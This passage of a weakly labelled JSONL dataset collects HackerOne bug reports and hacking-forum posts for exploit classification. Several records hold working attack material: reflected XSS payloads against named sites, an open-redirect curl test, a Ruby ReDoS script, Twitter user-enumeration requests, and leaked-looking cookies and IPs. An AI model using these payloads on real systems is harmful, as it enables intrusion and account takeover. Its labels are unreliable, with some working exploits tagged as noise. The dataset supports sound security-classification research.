attacker is able to change the logic of SQL statements executed against the database.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "30551c318dfd8b679a89", "text": "[Information Disclosure] Exposed gitlab repo at https://adammanco.mtn.com/api/v4/projects\n\n## Summary:\nHello\nI found Exposed gitlab repo at https://adammanco.mtn.com/api/v4/projects\n\n## Steps To Reproduce:\nVisit https://adammanco.mtn.com/api/v4/projects \n\n\n## Supporting Material/References:\n```\n[{\"id\":5,\"description\":\"\",\"name\":\"test\",\"name_with_namespace\":\"Jodrico Jansen Van Vuuren / test\",\"path\":\"test\",\"path_with_namespace\":\"jodricoj/test\",\"created_at\":\"2021-06-15T00:26:18.149Z\",\"default_branch\":\"master\",\"tag_list\":[],\"ssh_url_to_repo\":\"git@adammanco.mtn.com:jodricoj/test.git\",\"http_url_to_repo\":\"https://adammanco.mtn.com/jodricoj/test.git\",\"web_url\":\"https://adammanco.mtn.com/jodricoj/test\",\"readme_url\":\"https://adammanco.mtn.com/jodricoj/test/-/blob/master/README.md\",\"avatar_url\":null,\"forks_count\":0,\"star_count\":0,\"last_activity_at\":\"2021-08-31T08:53:24.964Z\",\"namespace\":{\"id\":5,\"name\":\"Jodrico Jansen Van Vuuren\",\"path\":\"jodricoj\",\"kind\":\"user\",\"full_path\":\"jodricoj\",\"parent_id\":null,\"avatar_url\":\"https://secure.gravatar.com/avatar/2cf402b5d9e6b968e1a07c72a60b8f5e?s=80\\u0026d=identicon\",\"web_url\":\"https://adammanco.mtn.com/jodricoj\"}}]```\n\n## Impact\n\ninformation disclosure\n\nRegard \n@aliyugombe", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-05", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7700f2f09124222b819d", "text": "[Unknown] Is the Google Bucket Meant To Be Publicly Listable? https://cdn.shopify.com/shop-assets/\n\nHi,\n\nI found that https://cdn.shopify.com/shop-assets/ is listing the all objects in https://storage.googleapis.com/arrive-assets-storage-production/\n\nBut when I directly visit https://storage.googleapis.com/arrive-assets-storage-production/, it says \n\n>Anonymous caller does not have storage.objects.list access to the Google Cloud Storage bucket.\n\nSo I wonder maybe it is unintentional that user can directly list all the objects in GCP using the link https://cdn.shopify.com/shop-assets/?\n\nPoC\n\n██████\n\n## Impact\n\nList objects in GCP that should be protected from anonymous users", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-02-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "501d6646f87d29084034", "text": "[Unknown] Issuer not verified from obtained token in user_oidc\n\nAs per OIDC spec the issues of the token should be verified to match the issuer obtained in the discovery phase.\nhttps://openid.net/specs/openid-connect-core-1_0.html#IDTokenValidation (step 2)\n\nVery similar to the aud check in https://github.com/nextcloud/user_oidc/blob/main/lib/Controller/LoginController.php\n\nThere are some more steps in that document that I don't think are currently implemented correctly.\nHowever I do not have an OIDC setup to check/verify. So might be worth it to have a look.\n\n## Impact\n\nWithout verifying the issuer a MITM is possible.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d0b655a2fc58573ff626", "text": "[Cross-site Scripting (XSS) - Reflected] reflected XSS in [www.equifax.com]\n\nhi , I hope you are well, i found reflected XSS in this endpoint:\n```https://www.equifax.com/personal/help/search?search=broook```\n\n\n\n###Steps:\n1. open ```https://www.equifax.com/personal/help/search?search=broook```\n2. view the source code of the page and search for word ```broook``` you will find that it reflected in the source code:\n{F2094830}\n\n\n\n3. ```broook``` word reflected in javascript code:\n```\n\n```\n\n\n-\n\n-\n\n\n\n4. By using this payload ```%22%20%2C%20internalSearchTerm%3A%20%5B7%5D.map%28alert%29%20%2C%20numOfSearchResultsReturned%3A%20%22b``` , I modified the parameters of the ```Analytics.trackEvent``` function to be like this:\n```\n\n\n```\n{F2094863}\n\n-\n-\n\n5. the following is the link with my XSS payload : https://www.equifax.com/personal/help/search?search=%22%20%2C%20internalSearchTerm%3A%20%5B7%5D.map%28alert%29%20%2C%20numOfSearchResultsReturned%3A%20%22b\n\n\n{F2094867}\n\n## Impact\n\nan attacker can exeute JS codes on the victims and this could be steal user's cookies", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a81827e9f2a71a4f11fa", "text": "[Improper Access Control - Generic] Discoverability by phone number/email restriction bypass\n\n**Summary:** By using this vulnerability an attacker can find a twitter account by it's phone number/email even if the user has prohibited this in the privacy options.\n\n**Description:** The vulnerability allows any party without any authentication to obtain a **twitter ID**(which is almost equal to getting the username of an account) of **any** user by submitting a phone number/email even though the user has **prohibitted this action in the privacy settings**. The bug exists due to the proccess of authorization used in the Android Client of Twitter, specifically in the procces of checking the duplication of a Twitter account.\n\n## Steps To Reproduce:\n\nIn this example I will show you how to get a Twitter ID of a user with an email \"████████\" (this an account created by me to demonstrate this bug)\n 0.Disable discoverability in your Twitter account settings \n 1. At first we create a LoginFlow by sending a POST request to \nhttps://api.twitter.com/1.1/onboarding/task.json?flow_name=login\n\nHeaders (stay the same for all the requests):\n>User-Agent: ████ (████)\n>Accept-Encoding: gzip, deflate\n>Authorization: Bearer ███████\n>X-Guest-Token: █████ __#This value changes dynamically and must be generated every once in a while__\n>Accept: application/json\n>X-Twitter-Client: TwitterAndroid\n>System-User-Agent: ██████\n>Content-Encoding: application/json\n>Content-Type: application/json\n>Accept-Language: en-US\n\nBody:\n>{\"flow_token\":null,\"input_flow_data\":{\"country_code\":null,\"flow_context\":{\"start_location\":{\"location\":\"deeplink\"}},\"requested_variant\":null,\"target_user_id\":0}}\n\nResponse:\n>{\"flow_token\":\"**██████**\",\"status\":\"success\",\"subtasks\":[{\"subtask_id\":\"LoginEnterUserIdentifier\",\"enter_text\":{\"primary_text\":{\"text\":\"To get started, first enter your phone, email, or @username\",\"entities\":[]},\"hint_text\":\"Phone, email, or username\",\"multiline\":false,\"auto_capitalization_type\":\"none\",\"auto_correction_enabled\":false,\"os_content_type\":\"username\",\"keyboard_type\":\"text\",\"next_link\":{\"link_type\":\"task\",\"link_id\":\"next_link\",\"label\":\"Next\"},\"skip_link\":{\"link_type\":\"subtask\",\"link_id\":\"forget_password\",\"label\":\"Forgot password?\",\"subtask_id\":\"RedirectToPasswordReset\"}},\"subtask_back_navigation\":\"cancel_flow\"},{\"subtask_id\":\"RedirectToPasswordReset\",\"open_link\":{\"link\":{\"link_type\":\"deep_link_and_abort\",\"link_id\":\"password_reset_deep_link\",\"url\":\"twitter://onboarding/task?flow_name=password_reset&input_flow_data=%7B%22requested_variant%22%3A%███%22%7D\"}}}]}\n\nAs you can see we have aquired the flow token value which is used in the next request.\n\n2. Send a POST request to https://api.twitter.com/1.1/onboarding/task.json with the same headers and a flow token aquired in the previous response\n\nBody:\n>{\"flow_token\":\"██████\",\"subtask_inputs\":[{\"enter_text\": {\"suggestion_id\":null, \"text\": \"**█████████**\", \"link\": \"next_link\"},\n \"subtask_id\": \"LoginEnterUserIdentifier\"}]}\n\nResponse:\n>{\"flow_token\":\"████\",\"status\":\"success\",\"subtasks\":[{\"subtask_id\":\"AccountDuplicationCheck\",\"check_logged_in_account\":{\"true_link\":{\"link_type\":\"task\",\"link_id\":\"AccountDuplicationCheck_true\"},\"false_link\":{\"link_type\":\"task\",\"link_id\":\"AccountDuplicationCheck_false\"},\"user_id\":\"**███**\"}}]}\nAs you can see we have aquired the user ID which can then be used to get the **full info** about the twitter account (there are many ways to do this), even though I have **disabled discoverability** in my user settings! \n\n## Impact: \nThis is a serious threat, as people can not only find users who have restricted the ability to be found by email/phone number, but any attacker with a basic knowledge of scripting/coding can enumerate a big chunk of the Twitter user base unavaliable to enumeration prior (**create a database with phone/email to username connections**). Such bases can be sold to malicious parties for advertising purposes, or for the purposes of tageting celebrities in different malicious activities\nAlso a cool feature that I discoverd is that you can e", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-02-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d75c98b21b996e4c7e9a", "text": "[Path Traversal] Multiple Path Transversal Vulnerabilites\n\nI have found multiple path transversal in *.torproject.org\nPOC:\n[+] https://www.torproject.org/about/findoc/\n[+] https://people.torproject.org/~infinity0/\n[+] https://deb.torproject.org/torproject.org/\nThere are many many others which can be accessed by searching following in google:\ninurl:\"index of\" site:torproject.org\nI know that its out of scope of your bounty program but I thought I should tell you about it.\nRegards!", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-11-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f4fbba08c3adb8156d93", "text": "Because even Linux users can get malware (it would be cool if a Windows version was there though).", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "zerosec", "timestamp": "2022-06-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a7735d47190460fd9f16", "text": "Hauutiwwx: Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box Oh no you didnt Im sort of frustrated, as the guidelines are very clear. Upload without RDPing. RDP after you uploaded.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-05-15", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2cedfff9ca8358860470", "text": "I was stuck on this too, simply because I wasn’t using sudo in my command. I STRONGLY DISAGREE that sudo should be a requirement for this question. Sudo is not required to read a pcap file in /tmp–even if sudo was used to create the pcap. Change my mind (this is a general comment, not a specific reply to @laurenchen0631 )", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-03-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "433b7a4f4d991650be7a", "text": "[Code Injection] https://www.wotif.com/vc/blog/info.php script is prone to reflected HTML/CSS injection and COOKIE leak\n\n## Summary:\nHi,\nI've found that https://www.wotif.com/vs/blog/info.php script is prone to reflected HTML/CSS injection and COOKIE leak. I don't know what is the purpose of that script, however looks like it caches for ~1h a last request over HTTP GET with all HTTP headers send by user + some headers send by Akamai. I'm not sure if there is any sensitive Akamai headers there (some headers reported by that scripts reveal a IP addresses from private network), but I'm sure that malicious actor may inject in that way some HTML/CSS code. As style and form are accepted so attacker probably could use that vulnerability for e.g. phising attack.\nFortunately - despite of many attempts I was unable to exploit this vulnerability as XSS - Akamai WAF protects that endpoint from XSS (at least as long as new bypass method is not found :))\n\nSecond problem with that script is related to HTTP_COOKIES header. As I mentioned before, this script caches all HTTP headers of visitor for ~1h, so if attacker convince the victim to visit that page, then victim cookies will be cached by script and visible to anybody who visit this script after victim.\n\nCurrent response:\n```\nTEMP => /tmp\nTMPDIR => /tmp\nTMP => /tmp\nPATH => /usr/local/bin:/usr/bin:/bin\nHOSTNAME =>\nUSER => nginx\nHOME => /var/lib/nginx\nHTTP_X_DATADOG_SAMPLING_PRIORITY => 0\nHTTP_X_DATADOG_PARENT_ID => 2356387789306272938\nHTTP_X_DATADOG_TRACE_ID => 2570661382097469643\nHTTP_CGP_AGENT_IDS_DUAID => 0c8072a3-7d9b-4be1-bbcf-d2acaaf8c627\nHTTP_CTX_USER_TUID => -1\nHTTP_CTX_USER_STATE => single-use\nHTTP_CTX_SITE_CURRENCY => AUD\nHTTP_CTX_SITE_EAPID => 0\nHTTP_CTX_SITE_TPID => 70125\nHTTP_CTX_SITE_LOCALE => en_AU\nHTTP_CTX_SITE_ID => 70125\nHTTP_CTX_PARTNER_ACCOUNT_ID => d34ca89e-4f80-4815-8057-b91672192b53\nHTTP_CTX_PRIVACY =>\nHTTP_CTX_AGENT_DEVICE_ID => 0c8072a3-7d9b-4be1-bbcf-d2acaaf8c627\nHTTP_EDGE_AGENT_TRAITS_CLASSIFICATION => UnknownBot\nHTTP_EDGE_AGENT_TRAITS_ALIGNMENT_SCORE => 0.0\nHTTP_EDGE_AGENT_TRAITS_BOTNESS_SCORE => 1.0\nHTTP_EDGE_AGENT_GEOLOCATION_INFO => {\"latitude\":50.27,\"longitude\":19.02,\"countryCode\":\"PL\",\"regionCode\":\"\",\"city\":\"KATOWICE\",\"continent\":\"EU\",\"postalCode\":\"\",\"timezone\":\"+01:00\",\"metroCode\":-1}\nHTTP_EDGE_AGENT_DEVICE_INFO => {\"brandName\":\"cURL\",\"modelName\":\"cURL\",\"isTablet\":false,\"isMobile\":false,\"resolutionHeight\":600,\"resolutionWidth\":800,\"physicalScreenHeight\":400,\"physicalScreenWidth\":400,\"type\":\"DESKTOP\"}\nHTTP_EDGE_AGENT_IP => 89.74.158.194\nHTTP_X_EXPEDIA_TPID => 70125\nHTTP_CGP_AGENT_GEOLOCATION_INFO => {\"latitude\":50.27,\"longitude\":19.02,\"countryCode\":\"PL\",\"regionCode\":\"\",\"city\":\"KATOWICE\",\"continent\":\"EU\",\"postalCode\":\"\",\"timezone\":\"+01:00\",\"metroCode\":-1}\nHTTP_CGP_AGENT_TRAITS_BOTNESS_SCORE => 1.0\nHTTP_CGP_AGENT_TRAITS_CLASSIFICATION => UnknownBot\nHTTP_X_CGP_ENV => ewecgp-prod\nHTTP_X_CGP_REGION => eu-west-1\nHTTP_CGP_AGENT_DEVICE_ID => 0c8072a3-7d9b-4be1-bbcf-d2acaaf8c627\nHTTP_CGP_AGENT_TRAITS_ALIGNMENT_SCORE => 0.0\nHTTP_X_EXPEDIA_EAPID => 0\nHTTP_X_EXPEDIA_SITE_ID => 70125\nHTTP_CGP_ROUTE_APPLICATION => seo-vendor-content-wotif-blog\nHTTP_X_CLOUD_GATE_DESTINATION_ID => seo-vendor-content-wotif-blog\nHTTP_CGP_ROUTE_ENDPOINT => seo-vendor-content-blog\nHTTP_X_BONO_CONFIDENCE => 100\nHTTP_X_BONO_RULES_EXECUTED => -\nHTTP_X_BONO_CLASSIFICATION => UnknownBot\nHTTP_COOKIE => MC1=GUID=0c8072a37d9b4be1bbcfd2acaaf8c627; DUAID=0c8072a3-7d9b-4be1-bbcf-d2acaaf8c627; HMS=c7e5fe2f-8c58-4e65-b97a-5c9f8f7371a9\nHTTP_DEVICE_USER_AGENT_ID => 0c8072a3-7d9b-4be1-bbcf-d2acaaf8c627\nHTTP_X_B3_SAMPLED => 1\nHTTP_X_B3_SPANID => bb92594475e89bbe\nHTTP_X_B3_TRACEID => 1557eb34142c42509d22dfee3abe67b7\nHTTP_MESSAGE_ID => 00000000-0000-0000-bb92-594475e89bbe\nHTTP_TRACE_ID => 1557eb34-142c-4250-9d22-dfee3abe67b7\nHTTP_X_CGP_INSTANCE => i-0f45203154581aa55\nHTTP_X_FORWARDED_PROTO => https\nHTTP_X_CGP_REQUEST_ID => 0838fecf-b682-11ed-a11c-0242edcb948b\nHTTP_VIA => 1.1 v1-akamaitech.net(ghost) (AkamaiGHost), 1.1 akamai.net(ghost) (AkamaiGHost), 1.1 styx\nHTTP_X_FORWARDED_HOST => www.wotif.com\nHTTP_X_FO", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "db3dec1006a5258f0c05", "text": "[Server-Side Request Forgery (SSRF)] SSRF Vulnerability through Connection test feature\n\nAn SSRF (Server-Side Request Forgery) attack can potentially be executed through the connection test feature, specifically when interacting with the Slack API. This attack allows an attacker to see the plain response, providing them with information that can aid in exploiting the vulnerability, rather than relying solely on blind SSRF techniques.\n\n## Impact\n\nThis vulnerability allows the user to access connection information and exploit the test connection feature by sending many requests, leading to a denial of service (DoS) condition on the server. Furthermore, malicious actors can leverage this vulnerability to establish harmful connections with the server, hit on metadata endpoints.\n\n{F2635041}", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-09-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9f2337d845cbfde378a2", "text": "[Misconfiguration] Security misconfiguration\n\n## Description :\nWhen we request a magic link to login into the application, and use that same link in multiple browsers, it working there isn't any limit on use of link.\n\nSteps to reproduce :\n1. go to app.lemilist.com\n2. create a magic link \n3. use it to login \n4. now open another browser or incognito window\n5. use that same magic link\n\nAnd You'll be logged in in your account.\n\n## Impact\n\nIf Attacker gets the magic link of user he can login into victim's account.\nAccount takeover.\n\nMitigation :\n1. Add a limit to magic link and remove the magic link from database after 1 use.\n2. only allow the Requester IP to login using the magic link.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "74f318cb28658b705f69", "text": "[Uncontrolled Resource Consumption] CVE-2023-28755: ReDoS vulnerability in URI\n\nOriginal report on the Ruby program: https://hackerone.com/reports/1444501\nAdvisort: https://www.ruby-lang.org/en/news/2023/03/28/redos-in-uri-cve-2023-28755/\nNIST entry: https://nvd.nist.gov/vuln/detail/CVE-2023-28755\nCVSS: 7.5 high `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` as listed by NIST but frankly I disagree with the `UI:N` part, I won't mind the extra 2k if you go with NIST but it didn't feel right not to mention it :) I filed the report with the CVSS I think this should have\n\nCopy of the original report:\n\n## Summary\n\nHello team, I hope you're doing well! The `URI` parser mishandles invalid URLs that have two `#` characters. It does correctly identify that they're invalid, but the regex performs very poorly and execution time grows much faster than the string length.\n\nI found this somewhat accidentally when fuzzing for something else. I'm not sure if you care about such issues but I figured I'd report it anyway. The length of the strings required to actually cause the process to hang are very long, but it's not really an issue when the user-controlled input is sent in a request body.\n\n## Steps to reproduce\n\nRun the following script\n\n```ruby\nrequire 'benchmark'\nrequire 'uri'\n\ndef parse(n)\n URI('https://example.com/dir/' + 'a' * n + '/##.jpg')\n rescue URI::InvalidURIError\n # Invalid URI because of the two #\nend\n\nn = 50000\nBenchmark.bm(7) do |x|\n x.report('Base length') { parse(n) }\n x.report('Length x2 ') { parse(n * 2) }\n x.report('Length x4 ') { parse(n * 4) }\n x.report('Length x8 ') { parse(n * 8) }\nend\n```\n\nHere's the output on my machine\n\n```plaintext\n user system total real\nBase length 1.086961 0.003059 1.090020 ( 1.090500)\nLength x2 4.415046 0.000000 4.415046 ( 4.416986)\nLength x4 22.021462 0.003294 22.024756 ( 22.042507)\nLength x8 122.695223 0.006653 122.701876 (122.853669)\n```\n\nWe can see the execution time is roughly quintuples when the string length only doubles.\n\nHere's my Ruby version\n\n```shell\n$ ruby -v\nruby 3.1.0p0 (2021-12-25 revision fb4df44d16) [x86_64-linux]\n```\n\n## Impact\n\nHigh resource consumption, reduced performance, denial of service", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2023-28755"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a577f5406ccb37d93eb6", "text": "Hack The Box Academy - FOOTPRINTING - DNS enumeration\n\nHello together, right now I’m stuck at in the FOOTPRINTING module of Hack The Box Academy in the DNS enumeration section. I’m stuck at the following question: “What is the FQDN of the host where the last octet ends with “x.x.x.203”?” I already used all the big subdomain lists from the SecLists directory to enumerate the subdomains but i did not find the ip address which ends with .203. I use dnsenum for the DNS enumeration. Can someone please give me some hints or point me to correct wordlist which can be used to find the correct ip? Best regards", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-01-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8459d9fda36ace87fc68", "text": "[Open Redirect] OPEN REDIRECT\n\nOpen Redirect Vulnerability\nHello , found open redirect in https://stage.test.dev-iam.xi.nutanix.com/api/iam/authn/v1/oidc/logout?post_logout_redirect_uri=.\n\nGo to\n\nhttps://stage.test.dev-iam.xi.nutanix.com/api/iam/authn/v1/oidc/logout?post_logout_redirect_uri=http://evil.com&id_token_hint=test\n\ncurl -I \"https://stage.test.dev-iam.xi.nutanix.com/api/iam/authn/v1/oidc/logout?post_logout_redirect_uri=http://evil.com&id_token_hint=test\"\n\nHTTP/2 302 \ncontent-type: text/html; charset=utf-8\nlocation: http://evil.com\ndate: Wed, 13 Oct 2021 20:55:57 GMT\nx-envoy-upstream-service-time: 2\nserver: envoy\n\n\n##Reference\n\nhttps://hackerone.com/reports/504751\nhttps://portswigger.net/kb/issues/00500100_open-redirection-reflected\n\n## Impact\n\nAn attacker can use this vulnerability to redirect users to other malicious websites, which can be used for phishing and similar attacks", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b2dea252cb8573c3751f", "text": "People who share knowledge in such an organized matter are one of a kind! Skimmed through it today, thanks for all the effort put!", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "zerosec", "timestamp": "2022-05-08", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4753534168f306353828", "text": "[Business Logic Errors] Business Logic, currency arbitrage - Possibility to pay less than the price in USD\n\nCurrency fluctuate all the time. Theses days EUR / USD key pair is around 1for1. It was even 1:0.99 when I was writing this report.\nPortswigger doesn't change dynamically the price and exchange rate dynamically. \n\nVulnerability at the following link: https://portswigger.net/buy/pro \n\nWhen you want to buy a product choose the currency, you can noticed they are fixed and with today difference it's quite a big difference.\n\n## Impact\n\nUSD price is 399$USD, while EUR price is 349$. \nTherefore someone could just change the price to Euro and pay 347 $USD (349 Euro) instead of 399$(with current rate).\n\nPS: It scale with the price, it could lead to thousands of dollars lost for your company.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-10-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c46b32058a9c6f7f12b0", "text": "[Cross-site Scripting (XSS) - Reflected] Reflected XSS online-store-git.shopifycloud.com\n\n## Summary:\nHello, I hope you are having a good day!,\n\nThere is a feature called \"Shopify Github Integration\", it helps to associate a GitHub account to a Shopify store. In the Github connection proccess there is a URL [https://online-store-git.shopifycloud.com](https://online-store-git.shopifycloud.com) which is vulnerable to XXS reflected.\n\n## Shops Used to Test:\n- devpresent.myshopify.com\n\n## Relevant Request IDs:\n- x-request-id: 1cdb077b2d319acccd1237c1142cf89b\n\n## Steps To Reproduce:\n1. Visit the next [URL](https://online-store-git.shopifycloud.com/github/setup?installation_id=20913869%7d%7d%7d%29%3b%7d%3balert%281337%29%3bif%281==2%29%7bk=new%20Promise%28function%28%29%7bif%281==2%29%7bv=%7be:%201&setup_action=install)\n```https://online-store-git.shopifycloud.com/github/setup?installation_id=20913869%7d%7d%7d%29%3b%7d%3balert%281337%29%3bif%281==2%29%7bk=new%20Promise%28function%28%29%7bif%281==2%29%7bv=%7be:%201&setup_action=install```\n2. Enter an owner or staff credentials.\n3. The XSS will fire.\n\n## Supporting Material:\n- xss.png\n- poc.mp4\n\n## Impact\n\nThere are several impacts.\n\n- The attacker could use Javascript in order to do phishing attacks.\n- Steal data.\n- Reflected JS\n\nMay you be well,\n-Misa", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "834d9dfd4d42ec838586", "text": "[Session Fixation] CVE-2023-40273: Session fixation in Apache Airflow web interface\n\nWhen I reset the password of the test user through the button Reset Password, I hope that the person who previously had the password of the test user will lose the corresponding authority. However, if others have logged in to the test user before, they can still use the account.\n{F2630619}\n{F2630620}\nIn short,Change user password wouldn't prevent an already authenticated user from being able to continue using the UI or API.\n\n## Impact\n\nThe session fixation vulnerability allowed the authenticated user to continue accessing Airflow webserver even after the password of the user has been reset by the admin - up until the expiry of the session of the user.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2023-40273"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-09-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0678a78d64b9f20ea4ab", "text": "[Cross-site Scripting (XSS) - Stored] Site information's Display Name section vulnerable for XSS attacks and HTML Injections.\n\n## Summary:\n\nHi, \n\nGreetings. I have found that site information's Display Name section on the try.pressable.com is vulnerable for potential XSS attacks and HTML Injections.\n\n## Steps To Reproduce:\n1. Visit https://try.pressable.com\n2. Create a new site.\n3. On the Display Name section, put the XSS / HTML Injection payloads.\n4. XSS will be triggered/ Injected HTML will be reflected.\n\nXSS Payload: \">\n\nHTML Payload: \n
\n\n

\n\n

\n\n
\n\n## Supporting Material/References:\nPOC Video attached\n\n## Impact\n\nDue to these vulnerabilities, attacker can easily divert victims to their malicious site and able to get credentials of victims.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bada631f1fd73db280cf", "text": "[Cross-site Scripting (XSS) - Reflected] Bypass of #2035332 RXSS at image.hackerone.live via the `url` parameter\n\nHeyy there,\nI was able to bypass the fix for the reflected xss reported in #2035332\n\nAfter the bug patch, the server now validates the `Content-Type` of the requested resource. The check is done by making a `HEAD` based request to the resource to get the `Content-Type` then if it corresponds to a valid image mime type a second request is made this time `GET` based to retrieve the page resource content.\n\nDue to the HEAD based check it's very easy to bypass this check, just need to modify the server to response with a different `Content-Type` in case of GET and HEAD request\n\nExample code:\n\n```php\n\n```\n\nTOCTOU ( time-of-check to time-of-use) : At the time of check the application relies upon HEAD request but at the time of use relies upon GET request this allows the attacker to bypass the protection.\n\n\nThis xss works only in the Safari browser , I was able to find the problem why it doesn't works in other browser. It had do something with the `Accept` header.\n\nOther browsers send the Accept header with these values: \n\n```\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\n```\nThe server applies sanitization if the Accept header is similar to above, in case of Safari it does something wierd (I don;t actually have a mac so not sure what's eactly it's sending in the Accept header)\nBut the server doesn;t does any sanitization if the header value is like this\n\n```\nAccept: */*\n```\n\n---------------------------------\n\n\n**Steps to reproduce:**\n\n1.Save this code in your webserver xss.php\n\n```php\n\n```\n2.Then input your host in the url parameter: https://image.hackerone.live:8443/resource/md/get/url?url=http://yourhost/ss.php\n3.Open this url in Safari browser and you should get the xss\n{F2593672}\n\n\n---------------------------------\n\n## Impact\n\nAs the server is behind cloudflare I can;t directly make a request to the AWS metadata endpoint, but for the least I can confirm the xss with the provided poc\n\nThankyou\nRegards\nSudhanshu", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ee50fa690073b2181f79", "text": "[Cross-site Scripting (XSS) - Generic] XSS on internal: privileged origin through reader mode\n\n## Summary:\n\nBrave iOS has two weaknesses described below. By combining them, XSS can be achieved on the privileged origin `internal://local`.\n\n1. Exposure of uuidKey through REFERER header\nReader mode in Brave has two HTML templates, [Reader.html](https://github.com/brave/brave-ios/blob/development/Client/Frontend/Reader/Reader.html) and [ReaderViewLoading.html](https://github.com/brave/brave-ios/blob/development/Client/Frontend/Reader/ReaderViewLoading.html). The former template defines [](https://github.com/brave/brave-ios/blob/development/Client/Frontend/Reader/Reader.html#L10) header for preventing referrer leakage, but the latter template [does not](https://github.com/brave/brave-ios/blob/development/Client/Frontend/Reader/ReaderViewLoading.html#L8). Therefore, by opening an external page through `ReaderViewLoading.html`, the `uuidKey` contained in the Reader mode page URL is leaked.\n\n2. XSS in SessionRestoreHandler\nSessionRestoreHandler is used to restore a previously used tab, but [it does not validate an URL to be restored](https://github.com/brave/brave-ios/blob/83eb41ac922d7bd18fd311e0a4279e02cdd8e190/Client/Frontend/Browser/SessionRestoreHandler.swift#L34). Therefore, if a javascript: URL is provided, the code is executed on the `internal:` domain.\n\nNote that the first vulnerability is not reproduced on iOS 15 because WKWebView's referrer policy has been changed to hostname only. However, according to [Apple's report in June 2021](https://developer.apple.com/support/app-store/), more than 90% of users were using iOS 14.\n\n## Products affected: \n\n* Brave iOS 1.32.3 and higher (include the latest Nightly) on iOS 14.x and below\n\n## Steps To Reproduce:\n\n* Visit https://csrf.jp/brave/reader_uuid_leakage.php\n* Open the page in Reader mode\n* Long tap a hyperlink in the page and choose \"Open in New Private Tab\"\n* Wait for several seconds and tap \"Load original page\"\n* uuidKey in the reader mode URL is stolen through REFERER header\n* Click an exploit URL in the page, then XSS is triggered on `internal://local`\n\n## Supporting Material/References:\n\n* xss_on_internal_origin_through_reader_mode.mov: video of the attack against the vulnerabilities\n* reader_uuid_leakage.php: server-side exploit code\n\n## Impact\n\n* Attacker can elevate privileges to `internal:` origin", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": 